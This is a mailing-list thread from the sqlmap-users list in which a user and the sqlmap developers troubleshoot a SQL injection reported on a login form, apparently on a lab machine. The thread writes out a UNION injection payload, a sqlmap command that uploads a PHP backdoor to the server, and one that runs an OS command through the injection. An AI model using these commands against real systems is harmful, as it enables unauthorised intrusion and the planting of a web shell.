There is always a 302 redirect, so I am not sure how ZAP detected this as a
SQLi.
Kind regards,
Miroslav Stampar
On Fri, Mar 21, 2014 at 3:19 PM, Brian Olson <br...@hurrikane.net> wrote:
> Thanks for the quick response, Miroslav and Bernardo. It's very much
> appreciated! There is a UNION technique that is being reported by ZAP, but
> sqlmap isn't finding it and I haven't quite figured out how to simply tell
> it what to use explicitly. ZAP detects a UNION vulnerability on
> activate.php:
>
>
>
> "act=auth-login&pag=login&username=ZAP%27+UNION+ALL+select+NULL+--+&password=ZAP"
>
> My attempts to input this have not been successful, so I'm not sure if
> it's a false positive or I'm not using sqlmap quite right (more likely).
>
> CMDLINE
> sqlmap -u "http://172.16.71.138:7879/activate.php"
> --data='act=auth-login&page=login&username=admin&password=admin' -p
> "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write
> /usr/share/webshells/php/simple-backdoor.php --file-dest
> progra~1/cyclope/ni4zlja=/backdoor.php --prefix="'" --suffix="UNION ALL
> select NULL --"
>
> As for the previous method, here's the attached file (on screen output was
> massive - password is "password"). End result "[09:01:51] [CRITICAL] all
> tested parameters appear to be not injectable. Also, you can try to rerun
> by providing either a valid value for option '--string' (or '--regexp')"
>
> Thanks for the help!
>
> Brian
>
>
>
> On Fri, Mar 21, 2014 at 8:02 AM, Bernardo Damele A. G. <
> bernardo.dam...@gmail.com> wrote:
>
>> On 21 March 2014 11:57, Bernardo Damele A. G. <bernardo.dam...@gmail.com>
>> wrote:
>> > [...]
>> > All in all, can you please relaunch sqlmap (make sure you run git pull
>> > first to sync to the GitHub repository) with the following syntax:
>>
>> Command line:
>>
>> python sqlmap.py -u "http://172.16.71.138:7879/index.php"
>> --data="act=auth-login&pag=login&username=admin&password=admin" -p
>> username --threads=10 --dbms=mysql --level=5 --risk=3 --os-cmd id -v 3
>> --parse-errors -t traffic.log --answers "language does the web server
>> support=4,do you want to use for writable=2,comma separate list of
>> absolute directory paths=C:/Progra~1/Cyclope/ni4zlja/,retrieve the=Y"
>>
>> Feel free to report back the result, the entire standard output of
>> sqlmap and send me the traffic.log.
>>
>> Thank you.
>> Bernardo
>>
>
>
>
> ------------------------------------------------------------------------------
> Learn Graph Databases - Download FREE O'Reilly Book
> "Graph Databases" is the definitive new guide to graph databases and their
> applications. Written by three acclaimed leaders in the field,
> this first edition is now available. Download your free book today!
> http://p.sf.net/sfu/13534_NeoTech
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
--
Miroslav Stampar
http://about.me/stamparm